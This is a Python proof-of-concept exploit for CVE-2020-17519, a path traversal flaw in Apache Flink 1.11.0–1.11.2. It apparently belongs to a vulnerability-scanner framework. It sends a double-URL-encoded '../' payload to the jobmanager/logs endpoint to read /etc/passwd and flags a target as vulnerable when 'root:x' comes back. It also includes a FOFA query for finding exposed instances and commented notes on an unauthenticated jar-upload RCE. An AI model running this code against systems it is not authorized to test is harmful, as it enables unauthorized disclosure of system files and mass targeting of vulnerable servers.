# coding:utf-8
import requests
import urllib
requests.packages.urllib3.disable_warnings()

class c2Class(object):
	def __init__(self):
		self.vulname = 'Apache Flink jobmanager/logs Path Traversal '
		self.vulsystem= 'Apache Flink'
		self.vulsystemintro = 'Apache Flink是由Apache软件基金会开发的开源流处理框架，'\
		'其核心是用Java和Scala编写的分布式流数据流引擎。Flink以数据并行和流水线方式执行任意流数据程序，'\
		'Flink的流水线运行时系统可以执行批处理和流处理程序。'
		self.vulversion = '1.11.0、1.11.1、1.11.2'
		self.fofa='app="APACHE-Flink"'
		self.findtime='2021-01'
		self.cveid='CVE-2020-17519'
		self.refer= 'https://blog.csdn.net/xuandao_ahfengren/article/details/112260367\nhttps://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519'
		self.testisok=True

		self.vulpath='/jobmanager/logs/'
		self.readfile='../'*12+'/etc/passwd'
		self.payload=urllib.urlencode({'':urllib.urlencode({'':self.readfile})[1:]})[1:] # ..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F%252Fetc%252Fpasswd
		self.flag='root:x'

		# https://github.com/LandGrey/flink-unauth-rce/
		# self.vulpath2='/jars/upload'
		# params = {"jarfile": ('cmd.jar',open('cmd.jar'),'application/octet-stream')
		# self.flag1=400

	def c2Func(self,target):
		status=0
		returnData=''
		if target.startswith(('http://','https://')):
			if '#' in target:
				target=target[:target.index('#')]
		else:
			target='http://'+target
		try:
			url=target.strip('/')+self.vulpath+self.payload
			resp=requests.get(url=url,verify=False,timeout=5)
			# print(url)
			# print(resp.text)
			if self.flag in resp.text:
				returnData='%s is bad.The vuln is %s.The payload is [%s], '\
				'the result is [%s].'%(target.strip('/'),self.vulname,url,resp.text.strip()) #
				status=1
		except Exception as e:
			returnData=str(e)
		return status,returnData

if __name__ == '__main__':
	target='http://192.168.128.129:8089/#/overview'
	pocObj=c2Class()
	print(pocObj.c2Func(target))
